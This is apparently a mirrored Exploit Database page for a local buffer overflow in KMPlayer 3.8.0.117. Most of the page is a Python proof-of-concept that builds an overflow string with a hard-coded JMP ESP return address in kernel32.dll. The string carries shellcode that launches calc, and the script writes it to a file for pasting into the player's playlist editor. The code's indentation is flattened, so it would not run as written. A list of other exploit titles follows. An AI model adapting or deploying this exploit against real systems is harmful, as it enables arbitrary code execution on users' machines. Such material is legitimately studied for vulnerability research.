KMPlayer 3.8.0.117 – Local Buffer Overflow

Exploit Database
16 阅读

作者： metacom

日期： 2014-03-10
类别：
- local
平台：
- windows
来源：https://www.exploit-db.com/exploits/32152/

#!/usr/bin/python
# KMPlayer 3.8.0.117 Buffer Overflow
# Author: metacom
# Tested on: Windows Xp pro-sp3 En
# Download link :http://www.chip.de/downloads/KMPlayer_33859258.html
# Version: 3.8.0.117 Kmp Plus
# Howto / Notes:
# Run KMPlayer Playlist Editor > New Album and paste Exploit Code
import struct
def little_endian(address):
return struct.pack("<L",address)


junk = "\x41" * 250
eip = little_endian(0x7C86467B) #7C86467B FFE4JMP ESPkernel32.dll

shellcode=(
"\x31\xC9"#// xor ecx,ecx
"\x51"#// push ecx
"\x68\x63\x61\x6C\x63"#// push 0x636c6163
"\x54"#// push dword ptr esp
"\xB8\xC7\x93\xC2\x77"#// mov eax,0x77c293c7
"\xFF\xD0"#// call eax
		)

exploit = junk + eip + shellcode
try:
rst= open("crash.txt",'w')
rst.write(exploit)
rst.close()
except:
print "Error"

last Exploits
KMPlayer 3.8.0.117 – Local Buffer Overflow的更多信息

Castripper 2.50.70 – ‘.pls’ DEP Bypass：
RadASM 2.2.1.6 – ‘.rap’ Universal Buffer Overflow：
libiec61850 1.3 – Stack Based Buffer Overflow：
Juju-run Agent – Privilege Escalation (Metasploit)：
No-IP Dynamic Update Client (DUC) 2.1.9 – Local IP Address Stack Overflow：
SilverSHielD 6.x – Local Privilege Escalation：
VX Search Enterprise 9.7.18 – Local Buffer Overflow：
IBM AIX High Availability Cluster Multiprocessing (HACMP) – Local Privilege Escalation：